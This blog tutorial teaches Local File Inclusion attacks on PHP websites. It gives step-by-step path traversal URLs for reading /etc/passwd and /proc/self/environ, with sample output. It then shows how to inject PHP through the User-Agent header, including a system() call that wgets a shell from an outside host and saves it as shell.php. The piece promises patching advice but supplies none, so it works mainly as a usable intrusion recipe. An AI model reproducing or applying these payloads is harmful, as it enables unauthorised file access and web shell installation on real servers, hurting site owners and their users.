Local File Inclusion (LFI) Vulnerability Attack

Local File Inclusion (LFI) Attack

Local File Inclusion (LFI) Vulnerability Attack

In this tutorial we will discuss about the local file inclusion vulnerability and how it occurs and can be patched so first let me start with introduction about file inclusion.

A file inclusion is a vulnerability which allows an attacker to access unauthorised file on web server and can execute the malicious code by using ‘include’ functional vulnerability.

What is Local File Inclusion (LFI) vulnerability ?

The local file inclusion LFI is a process of Including Local File available on webserver. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitised then an attacker give the some default files location and access all these sensitives files.

Finding Local file Inclusion (LFI)vulnerability in website

Now we are going to find an local file inclusion on website so we found a website lets check it if its vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now lets replace contact.php with ../ so the URL will become

www.vulnerablewebsite.com/view.php?page=../|

Now after requesting this page we got an error here big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request.

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

so we go more directories up..

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you will get a page like this that means you have successfully Included a /etc/passwd file.

 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

yeah we successfully included a file and our next step is to include a proc/self/environ file. so now replace /etc/passwd with /proc/self/environ file as shown below.

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this that means you have successfully included a proc/self/environ file.

 DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/pass wd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenvir
on SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at
www.vulnerablewebsite.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

Injecting a Malicious code in Local File Inclusion vulnerable website

Now let’s inject our malicious code in proc/self/environ.How we can do that? We can inject our code in User-Agent HTTP Header. Use Tamper Data Addon for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Now Tamper this page and in user agent add you uploader script and then submit. after submitting you will get an uploader or /proc/self/environ page just browse and upload your shell.

You can also upload your shell by downloading remotely using wget command.

 <?system('wget www.shell.com/shell.txt -O shell.php');?>

Add this command in user agent and request the page. Now our command is successfully executed and will download the .txt shell from www.shell.com/shell.txt and save it as shell.php  in the website directory) through system(), and our shell will be created.If don’t
work,try exec() because system() can be disabled on the webserver from php.ini.

Accessing our shell

Now lets check if our malicous code was successfully injected. Lets check if the shell is present.

www.vulnerablewebsite.com/shell.php

Our shell is there. Injection was succesfully.

So I think every body enjoyed this tutorial keep practising and learning. 🙂

Author: Ahmed Raza Memon

I am 17 years old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer From the India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been Acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many More...

2 thoughts on “Local File Inclusion (LFI) Vulnerability Attack”

Leave a Reply